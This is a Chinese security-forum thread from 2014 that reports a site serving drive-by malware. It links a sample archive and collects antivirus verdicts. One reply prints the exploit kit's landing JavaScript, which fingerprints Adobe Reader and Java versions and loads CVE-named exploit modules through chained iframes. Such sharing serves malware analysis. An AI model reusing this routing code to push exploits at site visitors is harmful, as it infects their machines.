收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 网络安全(毒网分析) http://365958.gargon98.web.hosting-test.net/ 挂 ...
返回列表 发新帖
查看: 2107|回复: 5
收起左侧

[未鉴定] http://365958.gargon98.web.hosting-test.net/ 挂马

[复制链接]
墨家小子
发表于 2014-1-15 17:45:03 | 显示全部楼层 |阅读模式
本帖最后由 墨家小子 于 2014-1-15 17:54 编辑

sshot-1.png

Administratorupdate.rar (391.18 KB, 下载次数: 98)

评分

参与人数 1人气 +2 收起 理由
fireold + 2 過幾天給你: )

查看全部评分

回复

举报

Miostartos
发表于 2014-1-15 17:46:22 | 显示全部楼层
本帖最后由 STCn1000 于 2014-1-15 19:00 编辑

avast 基因启发了这个文件
可以不上报了
更新数据
第二个文件avast也基因启发了
回复

举报

fireold
发表于 2014-1-15 18:58:45 | 显示全部楼层
  1. function getVersion(str) {

  3.     if (str == "Acrobat") {

  5.         var a_version = new Object();
  6.         a_version.exists = false;
  7.         a_version.version = '0';

  9.         var a_detect = PluginDetect.getVersion("AdobeReader");
  10.         if (a_detect != null) {
  11.             a_version.exists = true;
  12.             var vArray = a_detect.split(",");
  13.             a_version.version = vArray[0] + vArray[1] + vArray[2];
  14.         }
  15.         return a_version;

  17.     }
  18.     if (str == "Java") {
  19.         var j_version = new Object();
  20.         j_version.exists = false;
  21.         j_version.version = '0';
  22.         j_version.build = '0';

  24.         var j_detect = PluginDetect.getVersion('Java', 'include/getJavaInfo.jar')

  26.         if (j_detect != null) {
  27.             j_version.exists = true;
  28.             var vArray = j_detect.split(",");
  29.             j_version.version = vArray[1];
  30.             j_version.build = vArray[3];
  31.         }
  32.         return j_version;
  33.     }

  35. }

  37. var FramesArray = new Array();
  38. var CurrentModule = 0;

  40. function InitializeVisitor() {
  41.     var newDIV = document.createElement("div");
  42.     newDIV.innerHTML = "<iframe src='add_visitor.php?referrer='></iframe>";
  43.     document.body.appendChild(newDIV);
  44. }

  46. function NextModule() {

  48.     var newDIV = document.createElement("div");
  49.     newDIV.innerHTML = "<iframe src='" + FramesArray[CurrentModule] + "'></iframe>";
  50.     document.body.appendChild(newDIV);

  52.     if (CurrentModule < FramesArray.length - 1) {
  53.         CurrentModule++;
  54.         setTimeout("NextModule()", 5000);
  55.     }
  56. }

  58. function AcrobatModule() {
  59.     var a_version = getVersion("Acrobat");
  60.     if (a_version.exists) {
  61.         if (a_version.version >= 800 && a_version.version < 821) {
  62.             FramesArray.push("load_module.php?e=Adobe-80-2010-0188");
  63.         } else if (a_version.version >= 900 && a_version.version < 940) {
  64.             if (a_version.version < 931) {
  65.                 FramesArray.push("load_module.php?e=Adobe-90-2010-0188");
  66.             } else if (a_version.version < 933) {
  67.                 FramesArray.push("load_module.php?e=Adobe-2010-1297");

  69.             } else if (a_version.version < 940) {
  70.                 FramesArray.push("load_module.php?e=Adobe-2010-2884");
  71.             }
  72.         } else if (a_version.version >= 700 && a_version.version < 711) {
  73.             FramesArray.push("load_module.php?e=Adobe-2008-2992");
  74.         }
  75.     }
  76. }

  78. function JavaModule() {
  79.     var j_version = getVersion("Java");
  80.     if (j_version.exists) {
  81.         if (j_version.version < 6 || (j_version.version == 6 && j_version.build < 19)) {
  82.             FramesArray.push("load_module.php?e=Java-2010-0842");


  85.         }
  86.     }
  87. }

  89. function SignedModule() {
  90.     var j_version = getVersion("Java");
  91.     if (j_version.exists) {
  92.         FramesArray.push("load_module.php?e=JavaSignedApplet");
  93.     }
  94. }

  96. InitializeVisitor();

  98. JavaModule();

  100. AcrobatModule();

  102. SignedModule();
  103. if (FramesArray.length > 0) {
  104.     NextModule();
  105. }
复制代码
回复

举报

whohever
发表于 2014-1-15 19:27:33 | 显示全部楼层
AVG kill、
回复

举报

3801187
发表于 2014-1-15 19:33:05 | 显示全部楼层
2014-01-15_193338.png
回复

举报

vingerlin
发表于 2014-1-16 19:43:02 | 显示全部楼层
Bitdefender blocked this page
The page you are trying to access contains Gen:Variant.Symmi.18407.
回复

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-2-4 17:44 , Processed in 0.140071 second(s), 20 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表